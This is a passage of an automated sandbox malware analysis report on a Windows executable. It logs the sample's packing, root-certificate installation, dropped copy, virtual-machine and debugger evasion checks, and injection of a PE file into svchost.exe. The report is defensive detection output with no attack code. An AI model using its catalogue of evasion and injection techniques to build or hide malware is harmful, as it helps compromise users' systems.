Source: C:\Users\user\Desktop\ucD6u0vstJ.exe Code function: 1_2_0043921B push ebx; ret 1_2_0043921D
Source: C:\Users\user\Desktop\ucD6u0vstJ.exe Code function: 1_2_0043911D push esp; retf 1_2_0043911E
Source: C:\Users\user\Desktop\ucD6u0vstJ.exe Code function: 1_2_004392D5 push esp; retf 1_2_004392D6
Source: C:\Users\user\Desktop\ucD6u0vstJ.exe Code function: 1_2_00435EBE push eax; ret 1_2_00435ED1
Source: C:\Users\user\Desktop\ucD6u0vstJ.exe Code function: 1_1_0043921B push ebx; ret 1_1_0043921D
Source: C:\Users\user\Desktop\ucD6u0vstJ.exe Code function: 1_1_0043911D push esp; retf 1_1_0043911E
Source: C:\Users\user\Desktop\ucD6u0vstJ.exe Code function: 1_1_004392D5 push esp; retf 1_1_004392D6
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_00438844 push eax; retf 2_2_0043884F
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_0043921B push ebx; ret 2_2_0043921D
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_004392D5 push esp; retf 2_2_004392D6
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_00437A83 push esp; retf 2_2_00437A84
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_00438C8D push cs; retf 2_2_00438D1D
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_0043911D push esp; retf 2_2_0043911E
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_00438D27 push cs; retf 2_2_00438D1D
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_003E2829 push ecx; ret 2_2_003E283C
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 4_2_003B2829 push ecx; ret 4_2_003B283C
Binary may include packed or encrypted code
Source: initial sample Static PE information: section name: .text entropy: 7.94542714575

Persistence and Installation Behavior:

Installs new ROOT certificates
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Drops PE files
Source: C:\Users\user\Desktop\ucD6u0vstJ.exe File created: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe

Hooking and other Techniques for Hiding and Protection:

Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_003CEB30 GetVersion,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,FreeLibrary
Disables application error messages (SetErrorMode)
Source: C:\Users\user\Desktop\ucD6u0vstJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Delayed program exit found
Source: C:\Users\user\Desktop\ucD6u0vstJ.exe Code function: 1_2_00435977 Sleep,ExitProcess
Source: C:\Users\user\Desktop\ucD6u0vstJ.exe Code function: 1_2_00435A1B Sleep,ExitProcess
Source: C:\Users\user\Desktop\ucD6u0vstJ.exe Code function: 1_2_00435996 Sleep,ExitProcess
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess graph_2-14350
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_ComputerSystem
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_003E1250 rdtsc 2_2_003E1250
Contains functionality to query network adapter information
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: GetAdaptersInfo,GetAdaptersInfo,2_2_003D0C80
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: GetAdaptersInfo,GetAdaptersInfo,GetAdaptersInfo,4_2_003A0C80
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Window / User API: threadDelayed 1000
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Window / User API: threadDelayed 999
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Window / User API: threadDelayed 366
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 1158
Found evasive API chain checking for process token information
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_2-14779
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe TID: 3496 Thread sleep count: 1000 > 30
Source: C:\Windows\System32\taskeng.exe TID: 3560 Thread sleep time: -120000s >= -60000s
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe TID: 3572 Thread sleep count: 999 > 30
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe TID: 3656 Thread sleep count: 366 > 30
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe TID: 3656 Thread sleep time: -366000s >= -60000s
Source: C:\Windows\System32\svchost.exe TID: 3784 Thread sleep time: -180000s >= -60000s
Source: C:\Windows\System32\svchost.exe TID: 3968 Thread sleep count: 71 > 30
Source: C:\Windows\System32\svchost.exe TID: 3968 Thread sleep time: -710000s >= -60000s
Source: C:\Windows\System32\svchost.exe TID: 3968 Thread sleep count: 1158 > 30
Source: C:\Windows\System32\svchost.exe TID: 3968 Thread sleep time: -347400s >= -60000s
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_003C2450 GetFullPathNameW,PathAddBackslashW,FindFirstFileW,FindNextFileW,GetLastError,FindClose
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 4_2_00392450 GetFullPathNameW,PathAddBackslashW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,GetLastError,FindClose
Contains functionality to query system information
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_003C4A10 GetVersionExW,GetModuleHandleW,GetProcAddress,GetSystemInfo
Program exit points
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe API call chain: ExitProcess graph end node graph_2-14266
Queries a list of all running processes
Source: C:\Windows\System32\svchost.exe Process information queried: ProcessInformation

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Windows\System32\taskeng.exe System information queried: KernelDebuggerInformation
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_003E1250 rdtsc 2_2_003E1250
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_00437B9E GetCurrentProcess,LoadLibraryA,GetProcAddress,GetProcAddress,NtQueryInformationProcess
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_003D1D90 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcessHeap,RtlReAllocateHeap,RtlAllocateHeap
Enables debug privileges
Source: C:\Windows\System32\svchost.exe Process token adjusted: Debug
Contains functionality to register its own exception handler
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_003C952C SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 2_2_003C2B83 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 4_2_0039952C SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Code function: 4_2_00392B83 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Memory allocated: C:\Windows\System32\svchost.exe base: 60000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Memory allocated: C:\Windows\System32\svchost.exe base: 70000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Memory allocated: C:\Windows\System32\svchost.exe base: 10000000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Memory allocated: C:\Windows\System32\svchost.exe base: 10000000 protect: page read and write
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Memory allocated: C:\Windows\System32\svchost.exe base: 10001000 protect: page read and write
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Memory allocated: C:\Windows\System32\svchost.exe base: 10010000 protect: page read and write
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Memory allocated: C:\Windows\System32\svchost.exe base: 10014000 protect: page read and write
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Memory allocated: C:\Windows\System32\svchost.exe base: 10017000 protect: page read and write
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Memory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Memory allocated: C:\Windows\System32\svchost.exe base: C0000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Memory allocated: C:\Windows\System32\svchost.exe base: 100000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Memory allocated: C:\Windows\System32\svchost.exe base: 110000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Memory allocated: C:\Windows\System32\svchost.exe base: 360000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1001A000 protect: page read and write
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Memory allocated: C:\Windows\System32\svchost.exe base: 10022000 protect: page read and write
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Memory allocated: C:\Windows\System32\svchost.exe base: 100BA000 protect: page read and write
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Memory allocated: C:\Windows\System32\svchost.exe base: 100BB000 protect: page read and write
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Memory allocated: C:\Windows\System32\svchost.exe base: 100BC000 protect: page read and write
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe Memory allocated: C:\Windows\System32\svchost.exe base: F0000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: F0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 130000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 140000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: F0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 140000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 160000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 170000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 180000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 190000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 140000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 170000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 180000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 190000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: F0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 140000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 180000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 190000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B0000 protect: page execute and read and writeJump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
Memory written: C:\Windows\System32\svchost.exe base: 10000000 value starts with: 4D5A
Writes to foreign memory regions
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010008Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001000CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010010Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: C0000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010180Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010184Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010188Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001018CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010190Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 70000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010160Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010164Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010168Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001016CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010170Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: C0000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010178Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: C0000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010154Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010158Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 70000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: C0000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 110000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 70000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: C0000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 360000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 70000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 70000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 60000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 70000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: EE2104Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10000000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10001000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10001000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10022000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10022000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100BA000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100BA000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100BB000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100BB000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100BC000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100BC000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: F0000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 70000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: F0000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 70000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A038Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A03CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A040Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A044Jump to behavior
